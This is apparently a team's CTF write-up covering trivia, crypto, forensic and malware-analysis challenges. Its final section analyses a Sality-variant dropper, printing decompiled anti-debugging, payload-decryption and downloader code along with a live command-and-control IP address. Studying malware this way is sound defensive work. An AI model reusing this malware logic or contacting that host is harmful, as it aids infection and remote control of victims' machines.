A 16 19:59:42 p 20:13:16 (0.2) 20:11:30 Precursor (Calar Alto) 20:13:00
w 20:15:54 (1) 20:18 Plume (Calar Alto) (2)
s 20:13:24 (3)
B 17 02:54:15 s 02:56:09 (3) 02:50 Io reddens (L. Campanas) 02:53:00
02:50 H3+ ionosphere (4)
brightening (UKIRT)
02:56 Plume (Keck)
C 17 07:02:16 s 07:13:51 (3) 07:18 Plume (IRTF) 07:12:00
07:17 Plume (Okayama) (3)
07:11:57 Fireball (AAT)
D 17 11:47:02 s 11:52:50 (3) 11:54:46 Precursor (AAT) 11:54:00
12:00 2nd flash (AAT) (3)
12:01 Plume (Okayama)
E 17 15:04:54 w 15:12:11 (1) 15:17:30 Plume (Calar Alto) 15:12:00
s 15:12:11 (3) 15:18 Plume (SPIREX) (3)
F 18 00:29:39 00:33 Spot on terminator at 00:33:00
01:10 suggests impact (5)
at 00:33 (CTIO)
G 18 07:28:56 p 07:33:16 (0.5) 07:33:32 GLL PPR (1st) 07:33:32
w 07:33:17 (1) 07:34:36 GLL PPR (2nd) (30)
s 07:35:11 (3) 07:33:37 GLL NIMS
07:33:32 GLL UVS
07:32:58 Precursor (AAT)
31:33:7 1155af31
H 18 19:26:09 s 19:33:21 (3) 19:31:59 GLL PPR 19:31:59
19:33 Precursor (Calar Alto) (30)
19:33:04 Flash (Pic du Midi)
19:32:31 SPIREX
19:32:57 Flash (La Silla)
19:32:58 Flash (Vatican)
J 19 02:40 Not observed since Dec. 1993
K 19 10:18:23 s 10:30:58 (3) 10:24:14 GLL SSI 10:24:14
10:22:42 Precursor (AAT) (30)
10:24:33 Bright fireball (CASPIR)
10:24:02 1st brightness rise (Okayama)
10:25:08 2nd brightness rise (Okayama)
L 19 22:09:09 s 22:21:44 (3) 22:16:48 GLL PPR 22:16:48
22:16:30 Precursor (Calar Alto) (30)
22:17:30 Plume (Calar Alto)
22:17:35 1st of 3 flashes (Pic du Midi)
M 20 05:45 No observations since July 1993
06:08 Impact site obs. (Keck)
N 20 10:20:05 s 10:30:09 (3) 10:29:17 GLL SSI 10:29:17
10:35:23 Fireball (ANU) (30)
P2 20 15:16:21 No impact observations reported 15:23:00
(7)
P1 20 16:30 No observations since March 1994
Q2 20 19:47:19 s 19:46:31 (3) 19:44 Flash (Pic du Midi) 19:44:00
19:44 Precursor (Calar Alto) (4)
Q1 20 20:04:47 w 20:14:42 (1) 20:13:52 GLL PPR 20:13:52
s 20:18:24 (3) 20:13 Flash (Pic du Midi) (30)
20:13 Precursor (Calar Alto)
R 21 05:28:26 w 05:41:18 (1) 05:35:08 GLL NIMS 05:35:08
s 05:36:06 (3) 05:36:36 Precursor (AAT) (30)
05:34:52 1st flash (Palomar)
05:35:48 2nd flash (Palomar)
05:34:45 1st flash (Keck)
05:35:46 2nd flash (Keck)
05:35 1st notice (McDonald)
S 21 15:12:46 s 15:17:46 (3) 15:16 Brightening (SAAO) 15:16:00
15:22 2nd brightening (SAAO) (4)
15:19:20 Flash (Kavalur)
T 21 18:03:49 No impact observations reported 18:11:00
(7)
U 21 21:48:32 No impact observations reported 21:56:00
(7)
V 22 04:16:52 04:23:03 Flash (Palomar) 04:23:00
04:23:13 Fireball (AAT) (4)
W 22 08:00:50 p 08:06:16 (0.1) 08:06:17 GLL SSI 08:06:17
s 08:08:46 (3) 08:06:56 Precursor (AAT) (30)
The mentioning of Keck, Mount Palomar, an ionosphere, terminators and impacts all hinted strongly at astronomy, and especially at Jupiter (because of Io). Googling the month/day combination together with "Jupiter" and/or "impact" finally yielded (among other sites) http://www2.jpl.nasa.gov/sl9/impacts4.html, which contained the correct answer: "The Collision of Comet Shoemaker-Levy 9 and Jupiter".
Challenge 14
This was one of the crypto challenges. We didn’t manage to solve it, however
nobody else did either, whatever..:)
The challenge read:
Hint: Given: (1,2,1) 2001034nq5oos33n0p32roorso7oq1qrr581p632313498531poq5q742r110410r3sr2ssq57152905q64468p28oq63r76339q100 Solve for (2,1,2): ???
Solution as taken from IRC:
01:11 <%[smp]j5_> c14 01:12 <%[smp]j5_> my lovely 01:12 <%[smp]j5_> THINK GREEN -> SSL EV certificates (browser bar goes green when you surf traffic 01:13 <%[smp]j5_> millions of people per day -> verisign ads 175 million hits a day 01:13 <%[smp]j5_> search on EV certs on verisign, and you get their Intermediary certificates on their website 01:13 <%[smp]j5_> if you ever implemented EV certs, you sometimes need to include the intermediary certificates in your appliance or else the browser complains 01:14 <%[smp]j5_> they have primary (1) certificate and secondary (2) certificate 01:14 <%[smp]j5_> (1,2,1) and (2,1,2) are a 2-stage encrypt 01:14 <%[smp]j5_> (a,b,c) 01:14 <%[smp]j5_> a= first public key to transpose 01:14 <%[smp]j5_> b= second key to transpose 01:14 <%[smp]j5_> c= reverse output 01:15 <%[smp]j5_> with 1,2,1 you start with the primary intemediary certificate and then use secondary 01:15 <%[smp]j5_> you take every 3rd, but not 9th, nor 21st character 01:15 <%[smp]j5_> and if it's even, use from 1 01:15 <%[smp]j5_> if it's odd, use from 2 01:15 <%[smp]j5_> the end result is a 103 length string 01:15 <%[smp]j5_> which is conveniently prime 01:16 <%[smp]j5_> with inputs of 2,1,2 you start with secondary intemediary then primary intemediary, and reverse your answer at the end 01:16 <%[smp]j5_> had anyone got far enough, help would have been provided to deal with the reversing 01:16 <%[smp]j5_> people got as far as SSL EV certs 01:16 <%[smp]j5_> and started looking at verisign 01:17 <%[smp]j5_> and suggested to those teams to consider values longer than 103 chars (ie public keys) 01:17 <%[smp]j5_> i know SSL is practically uncrackable (for now) so any standard implementation of RSA was not on the table, even for my craziness 01:18 <%[smp]j5_> oh, and the strings were rot13'd which many people figured out 01:18 <%[smp]j5_> k, pretty much done
Challenge 15
Challenge 15 was a forensic challenge, although it could’ve easily passed as a trivia challenge as well. The only hints you got was a picture and some text about a stolen challenge.
Even if you'd known all the Bastard Operator From Hell episodes by heart, this
wouldn’t have helped much, as the picture’s name (BOFH.jpg) served only to
build a connection to a hint that came with another challenge, which it had
no obvious relation to. It contained a reference to the BOFH and the question
why he linked some directory to /dev/null (can’t remember the exact
wording).
Even with this, challenge 15 had us puzzled for a long time until someone
tried using /dev/null as a subdirectory of the smpctf web server which finally
got us one step further. The directory listing contained a number of related
files, mainly graphics related, most of which turned out to be a decoy. The
first psd file we looked at had several hidden layers, one of which contained
the flag (OmgYouFoundTheSecretFlagYAY). A few other psd files were variations of
this, with the flag text made illegible. It was only luck that we opened the
correct one first :)
Challenge 16
For this challenge we had a picture and some hints hints like "leave no stone unturned" and some things about spaces and "call for help", unfortunately I can’t remember the exact wording. In the challenge’s page source we could find an encoded (was it base64? can’t recall..) string linking to a higher resolution version of the picture. There was no direct hint about what kind of answer was expected.
We went to great lengths to find the solution to this challenge, even though the answer was provided from the start, unbeknownst to us. After analyzing the picture and its content by various means and looking up the place and company referenced in it, we even tried calling the company after having found it’s website and phone number. Amongst other things, we tried entering GPS coordinates and the text on the road sign partially visible in the background of the picture. However in the end it was the phone number of the company, which had to be entered in the correct format. As I said before, it was provided from the start - it was the name of the provided picture, with minor modifications.
Challenge 17
"Finally" a windows challenge :) Even though none that was running anywhere as a service. Instead we got a windows PE binary called jusched.win32_sality_NAO.vxe with the task to submit a brief analysis of this binary by mail until the end of the CTF. Excuse our lazyness but here’s just the file we submitted:
####################
# File Information
#####################
Filename c:\jusched.win32_sality_NAO.vxe
Filesize 309480 bytes
MD5 7c80e8df3e45fc60e4d64937ef4e0ff5
###################
# OS
###################
[ Operating System Differences ]
[[ XP ]]
- Windows XP SP2/SP3 no problems
[ Threads ]
explorer.exe
ctfmon.exe
notepad.exe
telnet.exe
plus the dropper called winmufjso.exe or winfyjny.exe on my system.
[[ Vista ]]
- Vista seemed to work as well
[Threads]
taskeng.exe
dwm.exe
explorer.exe
MSASCui.exe
conime.exe
notepad.exe
notepad.exe
[ Processed ]
rundll32.exe
rundll32.exe
[ Windows 7 ]
- Windows 7 - Binary Stopped working
###################
# Anti Debugging
###################
[ Debugger Trap ]
void *__cdecl sub_401000(int a1)
{
void *v2; // ecx@1
a1 = a1;
sub_410D08((int)&a1, (int)&unk_4348D0);
__asm { int 3 ; Trap to Debugger }
memset(v2, 0, 0x18u);
return v2;
}
[ IsDebuggerPresent ]
//----- (00412C3C) --------------------------------------------------------
BOOL __usercall sub_412C3C<eax>(int a1<ebx>, int a2<edi>, int a3<esi>)
{
...
v3 = IsDebuggerPresent();
SetUnhandledExceptionFilter(0);
if ( !UnhandledExceptionFilter(&ExceptionInfo) )
{
if ( !v3 )
sub_41A985();
}
v8 = GetCurrentProcess();
return TerminateProcess(v8, 0xC0000417u);
}
[ CreateThread CloseHandler ]
If an invalid handle is passed to the kernel32 CloseHandle() function (or directly to the ntdll NtClose() function), and no debugger is present, then an error code
is returned. However, if a debugger is present, an EXCEPTION_INVALID_HANDLE (0xc0000008) exception will be raised. This exception can be intercepted by an
exception handler, and is an indication that a debugger is running.
[ OutputDebug String ]
The kernel32 OutputDebugString() function can demonstrate different behaviour, depending on whether or not a debugger is present. The most obvious
difference in behaviour that the kernel32 GetLastError() function will return zero if a debugger is present.
[ Endless Sleep ]
Didn't figured that one out, but got so annoyed that I just filled it with nops and went on.
########################
# Infection
########################
Add stub to .exe files
original - 01/30/2005 11:31 AM 158,720 PEiD.exe
after - 01/30/2005 11:31 AM 220,160 PEiD2.exe
######################
# Analysis
######################
[ First Stage Loader ]
The first stage is done with some decription loop starting at 1518C.
00440000 33DB xor ebx,ebx
00440002 85C3 test ebx,eax
00440004 F7D6 not esi
00440006 BE C574678E mov esi,8E6774C5
0044000B 33CE xor ecx,esi
0044000D C6C0 B7 mov al,0B7
00440010 2C 94 sub al,94
The pseudo code looks like:
int __fastcall sub_440000(int a1, int a2)
{
int ST04_4_0; // ST04_4@0
int v3; // eax@1
int v10; // ST18_4@1
int v11; // ST20_4@1
int v12; // edx@4
int v13; // ecx@4
unsigned int v14; // ebx@4
int v15; // esi@4
int v16; // eax@9
int v17; // edx@9
char v18; // cl@9
int v19; // ebx@9
int v20; // edi@9
signed int v21; // esi@9
int v29; // ebx@1
int v39; // ett@1
int v40; // ecx@1
int v43; // ett@1
int v94; // eax@1
int v158; // ST10_4@2
unsigned int v159; // ST0C_4@2
int v160; // ST08_4@2
int v162; // esi@2
__int64 v184; // qt0@2
__int64 v185; // qt0@2
int v186; // ecx@2
int v187; // ecx@2
unsigned __int64 v188; // qt0@2
int v189; // ecx@2
int v208; // eax@2
unsigned __int64 v213; // qt0@2
int v214; // eax@2
int v240; // ST00_4@2
int v245; // esi@2
int v265; // edi@2
int v271; // ecx@2
unsigned __int64 v272; // qt0@2
unsigned __int64 v293; // qt0@2
char v313; // ah@5
char v320; // ch@10
int v321; // eax@10
int v322; // [sp-4h] [bp-4h]@4
_EBX = 0;
__asm { bsr eax, ebx }
v29 = _CF + _EAX - 1696150145;
_ESI = -1905822523;
_EBP = a2;
__asm
{
rcl esi, 35h
bswap edi
}
_ECX = 0;
_EAX = a2 + 1959;
__asm { bts ecx, eax }
v39 = _ECX;
v40 = v29;
_EBX = v39;
__asm { repne mov esi, ebp }
v43 = _ESI;
_ESI = v40;
_ECX = v43;
v11 = a2 + 4096;
__asm { rcl esi, 0D5h }
_ESI = _EBP + _ESI;
_EDI = 506954773;
__asm
{
bts ecx, 87h
rep adc esi, ebp
xadd ecx, esi
btc ebx, 0B8h
}
_ESI = 0;
__asm { btc edi, esi }
_ESI = __RCL__(_ESI, _CF);
__asm
{
repne bsf edi, esi
bsf edi, esi
}
_EAX = a2 + 4374;
__asm { bsf ecx, eax }
v10 = a2 + 4374;
_ECX = -1375234971;
_ESI = a2;
__asm { xadd ecx, esi }
_ECX = 240;
v94 = a2 + 155113380 + _CF;
_ESI = a2 + 4118;
LOBYTE(v94) = (_BYTE)a2 - 92 + _CF;
_EBX = v94;
_EDI = 1355916895;
__asm
{
xadd edi, ebx
repne xor ebx, 0C4557AC3h
}
_EAX = a2;
__asm
{
xadd ebx, eax
bt eax, ebx
}
_EAX = -1202073945;
_EBX = -1403182453;
_EDX = 157830;
__asm
{
xadd ebx, eax
bsf ebx, edx
}
_EDX = -66052;
__asm
{
bsf ebx, edx
bswap edi
}
_EDI = _EBP;
v3 = -67438088;
__asm { btc edi, 23h }
_EDI = 76921347;
__asm { rcr edi, cl }
_EBX = -15852480;
__asm
{
btc ebx, 0CFh
bsf ebx, edx
}
_EBX = 0;
_EDI = -202182160;
__asm
{
btc ebx, edx
bswap ebx
}
_EBX = -134810124;
do
{
v158 = _ESI;
v159 = _ECX;
v160 = v3;
LOBYTE(_EAX) = (_BYTE)v3 - 1;
v162 = _ECX + _ESI + 311970510;
__asm { bt eax, 61h }
--_EAX;
_CH = BYTE1(_ECX) & 0xF;
v162 -= 311970502;
__asm { xadd ch, al }
*(_DWORD *)v162 = v160;
__asm { bswap ecx }
_ECX = 0;
_EAX = v160 - 138653560;
__asm { repne imul ecx, eax }
_EAX = v160 - 138670507;
_ECX = (v160 - 138670507) * -594564790 * (v160 - 138655618);
__asm { bts ecx, eax }
*((_DWORD *)&v184 + 1) = (unsigned __int16)_EDI;
*(_DWORD *)&v184 = v160 - 138684067;
v185 = v184 << _EDI;
v186 = *((_DWORD *)&v185 + 1);
v187 = _EDI & (v186 + 1);
*((_DWORD *)&v185 + 1) = v187;
*(_DWORD *)&v185 = v160 - 138711507;
v188 = v185 << v187;
v189 = *((_DWORD *)&v188 + 1);
_ECX = _EDI & v189;
__asm { bts ecx, 0FDh }
_ECX = _EDI & _ECX;
_EAX = v160 - 138809127;
__asm { bts ecx, eax }
_EAX = v160 - 269488144;
__asm { bsf ecx, eax }
v162 += 4;
v208 = _EDI & _ECX;
__asm { rep push edx }
LOBYTE(v208) = ((_BYTE)_EDI & (_BYTE)_ECX) >> 9;
_EAX = _EBX * v208;
*(_DWORD *)v162 = ST04_4_0;
LOBYTE(_EAX) = -(_BYTE)_EAX;
_ECX = _EAX;
_EAX *= -1453426748;
__asm { repne xchg ecx, eax }
*(_DWORD *)&v188 = 305912057 * _EBX;
*((_DWORD *)&v188 + 1) = _EBX;
v213 = v188 >> 4 * (_BYTE)_EBX;
v214 = v213;
_ECX = ~(821371396 * _EBX);
__asm { repne and ecx, edi }
_EDX = _EDX - 269488144;
*(_DWORD *)&v213 = v214;
*((_DWORD *)&v213 + 1) = _EBX;
v213 >>= 12;
_EAX = v213;
ST04_4_0 = _EDX;
LOBYTE(_EAX) = _EDX;
_EAX &= 0x21362FDCu;
LOBYTE(_EAX) = BYTE1(_EDX);
v162 -= 8;
__asm
{
bt eax, ebx
bsf ecx, eax
}
_ECX = _EDI;
*(_DWORD *)v162 = _EBX;
__asm { bts ecx, eax }
_EBX = _EBX - 269488144;
_ECX = (unsigned __int64)_EAX >> 32;
__asm { bts ecx, 0FCh }
v240 = _EBX;
__asm { bt eax, ebx }
v245 = v162 - 277307120 + 277307116;
LOBYTE(_EAX) = BYTE1(_EDX);
__asm { bsf ecx, eax }
*(_DWORD *)v245 = _EDI;
_EBX = 1785950321;
__asm { bswap eax }
_EAX = -1356327833;
__asm { bt eax, ebx }
_ECX = 0;
__asm
{
bts ecx, 84h
rep inc ecx
}
_EAX = _ECX;
v265 = _EDI - 195263;
__asm { bsf ecx, eax }
v271 = v265 & _ECX;
*((_DWORD *)&v213 + 1) = v271;
*(_DWORD *)&v213 = _EAX;
v272 = v213 << v271;
_ECX = *((_DWORD *)&v272 + 1);
_EDI = v265 - 269292881;
_ECX *= 2;
__asm { bts ecx, eax }
BYTE1(_EDX) = -91;
_EBX = v240;
BYTE1(_EAX) = BYTE1(v245);
__asm { repne sub dh, ah }
_EDX = ST04_4_0;
_ESI = 959350547;
v3 = v160 - 269488144;
__asm { rcl esi, 0BAh }
_ESI = (v159 < 5) + _ESI + 802966994;
__asm { rcl esi, 0EAh }
_ECX = v159 - 6;
__asm { btc esi, ecx }
_ECX = v159 - 20;
__asm { bsf esi, ecx }
_ECX = v159 - 20 + 4;
*((_DWORD *)&v272 + 1) = _ESI;
*(_DWORD *)&v272 = v159 - 20 + 4;
v293 = v272 << _ECX;
_ESI = *((_DWORD *)&v293 + 1);
__asm { rcl esi, 0AAh }
_ESI = v158;
}
while ( _ECX >= 0 );
__asm { btc edi, esi }
_EAX = &v322;
_ECX = 1110149225;
__asm { repne shld ecx, eax, cl }
v15 = v322;
_EDI = -799988001;
_ECX = -252623233;
__asm { repne and ecx, edi }
_EBX = 2 * (-2074668846 * ST04_4_0 + 1);
__asm { xadd edx, ebx }
v13 = 0;
v12 = 0;
v14 = 0;
do
{
while ( 1 )
{
LOBYTE(v12) = *(_BYTE *)(_EBP + 4118 + v13) + *(_BYTE *)(v15 + v14) + (_BYTE)v12;
v313 = *(_BYTE *)(_EBP + 4118 + v12);
++v14;
*(_BYTE *)(_EBP + 4118 + v12) = *(_BYTE *)(_EBP + 4118 + v13);
*(_BYTE *)(_EBP + 4118 + v13) = v313;
if ( v14 >= 0xA )
break;
LOBYTE(v13) = (_BYTE)v13 + 1;
if ( !(_BYTE)v13 )
goto LABEL_9;
}
v14 = 0;
LOBYTE(v13) = (_BYTE)v13 + 1;
}
while ( (_BYTE)v13 );
LABEL_9:
_EDX = v14 + 1;
LOBYTE(_EDX) = 49;
__asm { btr edx, ebp }
v17 = 0;
v16 = 0;
v19 = 0;
v18 = -22;
v20 = v10 - 1;
v21 = 57066;
do
{
LOBYTE(v17) = (_BYTE)v17 + 1;
LOBYTE(v19) = *(_BYTE *)(_EBP + 4118 + v17) + (_BYTE)v19;
LOBYTE(v16) = *(_BYTE *)(_EBP + 4118 + v17);
v320 = *(_BYTE *)(_EBP + 4118 + v19);
*(_BYTE *)(_EBP + 4118 + v19) = *(_BYTE *)(_EBP + 4118 + v17);
*(_BYTE *)(_EBP + 4118 + v17) = v320;
LOBYTE(v321) = v320 + (_BYTE)v16;
++v20;
*(_BYTE *)v20 ^= *(_BYTE *)(_EBP + 4118 + v321);
--v18;
--v21;
}
while ( v21 );
return v11;
}
[ Stage 2 ]
CreateFileMappingA
MapViewOfFile
CreateThread
VirtualAlloc
- Copying PE File Sectors (UPX0, UPX1..)
LoadLibrary
VirtualProtect
[ Stage 3 ]
ProcessInjection
[ Threads ]
The Threads have security attributes set so it's not possible to attach with a debugger.
#########################
# DROPPER winaowdkb.exe
# #######################
UPX packed but can be unpacked with upx -d
F:\upx305w>upx.exe -d winaowdkb.exe
Ultimate Packer for eXecutables
Copyright (C) 1996 - 2010
UPX 3.05w Markus Oberhumer, Laszlo Molnar & John Reiser Apr 27th 2010
File size Ratio Format Name
-------------------- ------ ----------- -----------
24576 <- 8704 35.42% win32/pe winaowdkb.exe
Unpacked 1 file.
Due to time I can only attach a decompilation of the dropper exe
But from the code you can see that it would make a HTTP request to
"http://72.232.11.26/" with different variables.
[ Source Code ]
//----- (0040100A) --------------------------------------------------------
int __cdecl sub_40100A()
{
int result; // eax@1
result = GetTickCount();
dword_405580 = result;
return result;
}
//----- (0040101A) --------------------------------------------------------
unsigned int __cdecl sub_40101A()
{
dword_405580 = 22695477 * dword_405580 + 1;
return (unsigned int)dword_405580 >> 16;
}
//----- (00401044) --------------------------------------------------------
int __cdecl sub_401044(int a1, int a2)
{
int v3; // [sp+4h] [bp-4h]@2
int v4; // [sp+0h] [bp-8h]@2
while ( *(_BYTE *)a1 )
{
v3 = a1;
v4 = a2;
while ( *(_BYTE *)v3 && *(_BYTE *)v4 && *(_BYTE *)v3 == *(_BYTE *)v4 )
{
++v3;
++v4;
}
if ( v3 == v4 || !*(_BYTE *)v4 )
return a1;
++a1;
}
return 0;
}
//----- (004010C6) --------------------------------------------------------
CHAR *__cdecl sub_4010C6(int a1)
{
CHAR v2; // [sp+4h] [bp-80h]@1
char v3; // [sp+5h] [bp-7Fh]@1
__int16 v4; // [sp+81h] [bp-3h]@1
char v5; // [sp+83h] [bp-1h]@1
v2 = 0;
memset(&v3, 0, 0x7Cu);
v4 = 0;
v5 = 0;
if ( a1 )
wsprintfA(&v2, "%d", a1);
return &v2;
}
//----- (00401107) --------------------------------------------------------
char __cdecl sub_401107(int a1)
{
int v2; // [sp+4h] [bp-4h]@3
signed int v3; // [sp+0h] [bp-8h]@3
if ( a1 )
{
if ( *(_BYTE *)a1 )
{
v2 = 0;
v3 = 0;
while ( *(_BYTE *)(v2 + a1) )
{
if ( *(_BYTE *)(v2 + a1) == 46 )
++v3;
++v2;
}
}
}
return v3 == 3;
}
//----- (0040116C) --------------------------------------------------------
signed int __cdecl sub_40116C(char *name)
{
unsigned __int32 v2; // eax@1
struct hostent *v3; // eax@4
signed int v4; // [sp+4h] [bp-4h]@1
struct hostent *v5; // [sp+0h] [bp-8h]@4
v2 = inet_addr(name);
v4 = v2;
if ( v2 == -1 || !v4 && *name != 48 )
{
v3 = gethostbyname(name);
v5 = v3;
if ( v3 )
v4 = **(_DWORD **)v5->h_addr_list;
}
if ( v4 == -1 )
v4 = 0;
return v4;
}
//----- (004011D1) --------------------------------------------------------
signed int __cdecl sub_4011D1(char *a1)
{
signed int v2; // eax@1
signed int v3; // [sp+4h] [bp-18h]@1
signed int v4; // [sp+8h] [bp-14h]@1
struct sockaddr name; // [sp+Ch] [bp-10h]@1
SOCKET s; // [sp+0h] [bp-1Ch]@1
v3 = sub_40116C(a1);
v4 = 0;
*(_DWORD *)&name.sa_data[4] = 0;
*(_DWORD *)&name.sa_data[8] = 0;
*(_WORD *)&name.sa_data[12] = 0;
name.sa_family = 2;
*(_WORD *)&name.sa_data[0] = htons(0x19u);
*(_DWORD *)&name.sa_data[2] = v3;
v2 = socket(2, 1, 6);
s = v2;
if ( v2 != -1 )
{
if ( !connect(s, &name, 16) )
v4 = 1;
}
closesocket(s);
return v4;
}
//----- (0040126C) --------------------------------------------------------
signed int __cdecl sub_40126C()
{
signed int result; // eax@2
signed __int16 v1; // ax@1
signed int v2; // [sp+0h] [bp-4h]@1
v2 = 0;
v1 = sub_40101A();
if ( sub_4011D1(*(&off_405020 + (unsigned __int16)v1 % 10)) )
{
result = 1;
}
else
{
v2 = 0;
while ( v2 != 10 )
{
if ( sub_4011D1(*(&off_405020 + v2)) )
return 1;
++v2;
}
result = 0;
}
return result;
}
//----- (004012E2) --------------------------------------------------------
signed int __cdecl sub_4012E2(char *cp, LPSTR a2)
{
signed int result; // eax@2
unsigned __int32 v3; // eax@1
unsigned __int32 v4; // [sp+4h] [bp-4h]@1
v3 = inet_addr(cp);
v4 = v3;
if ( v3 == -1 )
{
result = 0;
}
else
{
wsprintfA(a2, "%u.%u.%u.%u", BYTE3(v4), BYTE2(v4), BYTE1(v4), (unsigned __int8)v4);
result = 1;
}
return result;
}
//----- (00401355) --------------------------------------------------------
signed int __cdecl sub_401355(char *cp)
{
signed int result; // eax@7
const CHAR String2; // [sp+8h] [bp-618h]@1
char v3; // [sp+9h] [bp-617h]@1
__int16 v4; // [sp+109h] [bp-517h]@1
char v5; // [sp+10Bh] [bp-515h]@1
CHAR name; // [sp+10Ch] [bp-514h]@1
char v7; // [sp+10Dh] [bp-513h]@1
__int16 v8; // [sp+20Dh] [bp-413h]@1
char v9; // [sp+20Fh] [bp-411h]@1
char v10; // [sp+220h] [bp-400h]@1
char v11; // [sp+221h] [bp-3FFh]@1
__int16 v12; // [sp+61Dh] [bp-3h]@1
char v13; // [sp+61Fh] [bp-1h]@1
int v14; // [sp+210h] [bp-410h]@1
int v15; // [sp+21Ch] [bp-404h]@1
signed int v16; // [sp+214h] [bp-40Ch]@1
int v17; // [sp+218h] [bp-408h]@1
signed int v18; // [sp+4h] [bp-61Ch]@8
String2 = 0;
memset(&v3, 0, 0x100u);
v4 = 0;
v5 = 0;
name = 0;
memset(&v7, 0, 0x100u);
v8 = 0;
v9 = 0;
v10 = 0;
memset(&v11, 0, 0x3FCu);
v12 = 0;
v13 = 0;
v14 = 0;
v15 = 0;
v16 = 0;
v17 = 0;
while ( cp[v17] )
{
if ( cp[v17] == 46 )
++v16;
++v17;
}
v16 = 3;
if ( sub_4012E2(cp, (LPSTR)&String2) )
{
v18 = 0;
v17 = 0;
while ( *(&lpString2)[4 * v17] )
{
lstrcpyA(&name, "2.0.0.127");
lstrcatA(&name, (&lpString2)[4 * v17]);
if ( gethostbyname(&name) )
{
lstrcpyA(&name, &String2);
lstrcatA(&name, (&lpString2)[4 * v17]);
if ( gethostbyname(&name) )
++v18;
}
++v17;
}
result = v18;
}
else
{
result = 20;
}
return result;
}
//----- (00401544) --------------------------------------------------------
int __cdecl sub_401544(int a1, signed int a2, int a3)
{
int result; // eax@4
int v4; // [sp+Ch] [bp-8h]@1
signed int v5; // [sp+8h] [bp-Ch]@1
int v6; // [sp+0h] [bp-14h]@4
signed int v7; // [sp+4h] [bp-10h]@4
int v8; // [sp+10h] [bp-4h]@6
v4 = a3;
v5 = 0;
while ( v5 < 256 )
{
*(_BYTE *)(v5 + v4) = v5;
++v5;
}
LOBYTE(v6) = 0;
*(_BYTE *)(a3 + 257) = 0;
result = a3;
*(_BYTE *)(a3 + 256) = v6;
v7 = 0;
v5 = 0;
while ( v5 < 256 )
{
LOBYTE(v8) = *(_BYTE *)(v5 + v4);
LOBYTE(v6) = *(_BYTE *)(v7++ + a1) + (_BYTE)v8 + (_BYTE)v6;
*(_BYTE *)(v5 + v4) = *(_BYTE *)(v4 + (unsigned __int8)v6);
*(_BYTE *)(v4 + (unsigned __int8)v6) = v8;
++v5;
result = v7 / a2;
v7 %= a2;
}
return result;
}
//----- (0040161D) --------------------------------------------------------
int __cdecl sub_40161D(int a1, int a2, int a3)
{
int result; // eax@4
int v4; // [sp+10h] [bp-8h]@1
int v5; // [sp+Ch] [bp-Ch]@1
int v6; // [sp+4h] [bp-14h]@1
int v7; // [sp+8h] [bp-10h]@1
int v8; // [sp+14h] [bp-4h]@3
v4 = a3;
LOBYTE(v5) = *(_BYTE *)(a3 + 256);
LOBYTE(v6) = *(_BYTE *)(a3 + 257);
v7 = 0;
while ( v7 < a2 )
{
LOBYTE(v5) = (_BYTE)v5 + 1;
LOBYTE(v8) = *(_BYTE *)(v4 + (unsigned __int8)v5);
LOBYTE(v6) = (_BYTE)v8 + (_BYTE)v6;
*(_BYTE *)(v4 + (unsigned __int8)v5) = *(_BYTE *)(v4 + (unsigned __int8)v6);
*(_BYTE *)(v4 + (unsigned __int8)v6) = v8;
LOBYTE(v8) = *(_BYTE *)(v4 + (unsigned __int8)v5) + (_BYTE)v8;
*(_BYTE *)(v7++ + a1) ^= *(_BYTE *)(v4 + (unsigned __int8)v8);
}
*(_BYTE *)(a3 + 256) = v5;
result = a3;
*(_BYTE *)(a3 + 257) = v6;
return result;
}
//----- (00401890) --------------------------------------------------------
size_t __cdecl sub_401890(int a1, void *Dst, size_t Size, int a4)
{
int v5; // eax@6
int v6; // eax@7
char Src; // [sp+98h] [bp-408h]@1
char v8; // [sp+99h] [bp-407h]@1
CHAR String1; // [sp+8h] [bp-498h]@1
char v10; // [sp+9h] [bp-497h]@1
__int16 v11; // [sp+85h] [bp-41Bh]@1
char v12; // [sp+87h] [bp-419h]@1
size_t v13; // [sp+88h] [bp-418h]@1
size_t v14; // [sp+49Ch] [bp-4h]@1
int Data; // [sp+4h] [bp-49Ch]@1
HKEY hKey; // [sp+8Ch] [bp-414h]@1
int v17; // [sp+94h] [bp-40Ch]@6
int v18; // [sp+90h] [bp-410h]@7
Src = 0;
memset(&v8, 0, 0x400u);
String1 = 0;
memset(&v10, 0, 0x7Cu);
v11 = 0;
v12 = 0;
v13 = 1024;
v14 = 0;
Data = 0;
memset(Dst, 0, Size);
if ( !RegOpenKeyExA(
HKEY_CURRENT_USER,
"Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings",
0,
0xF003Fu,
&hKey) )
{
Data = 0;
RegSetValueExA(hKey, "GlobalUserOffline", 0, 4u, (const BYTE *)&Data, 4u);
RegCloseKey(hKey);
}
if ( (unsigned __int8)a4 )
lstrcpyA(&String1, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)");
else
lstrcpyA(&String1, "Opera/9.00 (Windows NT 5.1; U; en)");
v5 = InternetOpenA(&String1, 1, 0, 0, 67108864);
v17 = v5;
if ( v5 )
{
v6 = InternetOpenUrlA(v17, a1, 0, 0, -2080374784, 0);
v18 = v6;
if ( v6 )
{
if ( Dst )
{
do
{
if ( InternetReadFile(v18, &Src, 1024, &v13) )
{
if ( v14 >= Size || v13 + v14 > Size )
break;
memcpy((char *)Dst + v14, &Src, v13);
v14 += v13;
}
}
while ( v13 );
}
}
}
if ( v18 )
InternetCloseHandle(v18);
if ( v17 )
InternetCloseHandle(v17);
return v14;
}
//----- (00401A7E) --------------------------------------------------------
void __stdcall StartAddress(LPVOID a1)
{
CHAR *v1; // eax@5
CHAR *v2; // eax@5
CHAR *v3; // eax@5
CHAR *v4; // eax@5
DWORD v5; // eax@8
int v6; // eax@8
CHAR *v7; // eax@21
CHAR *v8; // eax@21
CHAR *v9; // eax@21
CHAR *v10; // eax@21
signed int v11; // ST18_4@21
unsigned __int32 v12; // ST14_4@21
DWORD v13; // ST10_4@21
signed int v14; // ST0C_4@21
int v15; // eax@21
signed int v16; // ST18_4@25
unsigned __int32 v17; // ST14_4@25
DWORD v18; // ST10_4@25
signed int v19; // ST0C_4@25
int v20; // eax@25
CHAR String2; // [sp+5C0h] [bp-200Ch]@1
char v22; // [sp+5C1h] [bp-200Bh]@1
__int16 v23; // [sp+25BDh] [bp-Fh]@1
char v24; // [sp+25BFh] [bp-Dh]@1
CHAR String; // [sp+8h] [bp-25C4h]@1
char v26; // [sp+9h] [bp-25C3h]@1
__int16 v27; // [sp+405h] [bp-21C7h]@1
char v28; // [sp+407h] [bp-21C5h]@1
